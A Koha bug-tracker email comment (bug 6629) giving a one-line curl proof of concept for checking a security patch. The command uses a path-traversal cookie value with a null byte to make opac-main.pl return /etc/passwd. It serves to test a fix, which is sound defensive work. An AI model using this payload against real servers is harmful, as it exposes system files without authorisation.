http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6629
--- Comment #10 from Frère Sébastien Marie <[email protected]> 2011-11-25 07:36:52 UTC --- In order to check the patch against the vulnerability, here a little poc using curl (a shell tool): > curl -v -b 'KohaOpacLanguage=../../../../../../../../etc/passwd%00' > 'http://myopac.example.com/cgi-bin/koha/opac-main.pl' A vulnerable result show the /etc/passwd file A non vulnerable result show 'opac-main' in the default Language (en). The test suppose a linux/BSD server. -- Configure bugmail: http://bugs.koha-community.org/bugzilla3/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the QA Contact for the bug. You are watching all bug changes. _______________________________________________ Koha-bugs mailing list [email protected] http://lists.koha-community.org/cgi-bin/mailman/listinfo/koha-bugs website : http://www.koha-community.org/ git : http://git.koha-community.org/ bugs : http://bugs.koha-community.org/
